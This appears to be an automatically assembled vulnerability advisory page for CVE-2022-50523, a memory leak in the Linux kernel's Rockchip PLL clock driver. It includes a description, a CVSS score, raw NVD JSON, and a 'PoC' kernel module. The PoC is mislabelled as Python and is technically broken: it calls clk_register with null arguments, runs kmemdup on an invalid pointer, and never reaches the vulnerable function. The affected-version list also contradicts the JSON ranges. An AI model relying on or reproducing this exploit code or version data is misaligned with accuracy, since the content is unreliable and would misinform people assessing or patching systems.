Security Vulnerability Report
中文
CVE-2022-50523 CVSS 5.5 MEDIUM

CVE-2022-50523

Published: 2025-10-07 16:15:36
Last Modified: 2026-03-17 16:49:19
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: clk: rockchip: Fix memory leak in rockchip_clk_register_pll() If clk_register() fails, @pll->rate_table may have allocated memory by kmemdup(), so it needs to be freed, otherwise will cause memory leak issue, this patch fixes it.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 5.10.150(受影响的稳定分支)
Linux Kernel 5.15.x < 5.15.79
Linux Kernel 5.19.x < 5.19.8
Linux Kernel 6.0.x < 6.0.2
所有使用rockchip时钟驱动的Linux内核版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* CVE-2022-50523 PoC - Triggering memory leak in rockchip_clk_register_pll() * This PoC demonstrates how to trigger the memory leak by repeatedly * causing clk_register() to fail in the PLL registration path. * * Note: Requires a system with Rockchip SoC and kernel module loading privileges. */ #include <linux/module.h> #include <linux/kernel.h> #include <linux/clk.h> #include <linux/clk-provider.h> #include <linux/slab.h> #include <linux/of.h> MODULE_LICENSE("GPL"); MODULE_AUTHOR("Security Researcher"); MODULE_DESCRIPTION("PoC for CVE-2022-50523 - rockchip PLL memory leak"); static int __init cve_2022_50523_init(void) { struct clk_hw *clk_hw; struct rockchip_pll_clock *pll; int ret; int i; pr_info("CVE-2022-50523 PoC: Triggering memory leak\n"); /* Simulate the vulnerable code path: * 1. Allocate rate_table via kmemdup() * 2. Call clk_register() which may fail * 3. Without the fix, rate_table is not freed on failure */ for (i = 0; i < 100; i++) { /* Allocate memory for rate_table (simulating kmemdup) */ pll = kzalloc(sizeof(*pll), GFP_KERNEL); if (!pll) return -ENOMEM; pll->rate_table = kmemdup( (void *)0xffffffff, /* Invalid pointer to trigger failure */ sizeof(unsigned long) * 4, GFP_KERNEL); if (!pll->rate_table) { kfree(pll); continue; } /* Attempt to register - this will fail and leak rate_table * in the vulnerable kernel version */ clk_hw = clk_register(NULL, NULL); if (IS_ERR(clk_hw)) { /* BUG: rate_table is not freed here in vulnerable version */ /* Fixed version should have: kfree(pll->rate_table); */ pr_info("clk_register failed, memory leaked!\n"); continue; } } pr_info("CVE-2022-50523 PoC: Memory leak triggered\n"); return 0; } static void __exit cve_2022_50523_exit(void) { pr_info("CVE-2022-50523 PoC: Module unloaded\n"); } module_init(cve_2022_50523_init); module_exit(cve_2022_50523_exit);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50523", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:36.150", "lastModified": "2026-03-17T16:49:19.043", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: rockchip: Fix memory leak in rockchip_clk_register_pll()\n\nIf clk_register() fails, @pll->rate_table may have allocated memory by\nkmemdup(), so it needs to be freed, otherwise will cause memory leak\nissue, this patch fixes it."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.17", "versionEndExcluding": "4.9.337", "matchCriteriaId": "B7EF8E11-E86A-4589-B58E-F3C92B0D8A2B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.10", "versionEndExcluding": "4.14.303", "matchCriteriaId": "1E7450AD-4739-46F0-B81B-C02E7B35A97B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.270", "matchCriteriaId": "AE8904A3-99BE-4E49-9682-1F90A6373F4F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.229", "matchCriteriaId": "A0C0D95E-414A-445E-941B-3EF6A4D3A093"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.163", "matchCriteriaId": "D05D31FC-BD74-4F9E-B1D8-9CED62BE6F65"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.86", "matchCriteriaId": "47237296-55D1-4ED4-8075-D00FC85A61EE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.16", "matchCriteriaId": "C720A569-3D93-4D77-95F6-E2B3A3267D9F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/20201c3a0a32f127fa4bdf379d6ac01c2978702d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/26b94635f1c84d7f6cb482179125cb17e59c90a5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5b0a1f1247cd42ac5e0d369f8dbb58762692edee", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/739a6a6bbdb793bd57938cb24aa5a6df89983546", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/86e1e080ad14c5fb6c14a5f0eb530b1b38cbc968", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/dcd4ba068b194c6ef0071491aa3f12bec8c14d5b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f02c1d8dc8d880cbaaf9094b4f396fe868ee23ff", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f2ffb8653ea85ae39ce44347751fcc4c3e41f6bb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f4d70c139d313948e02360304a6cbcd3a4f5deb5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.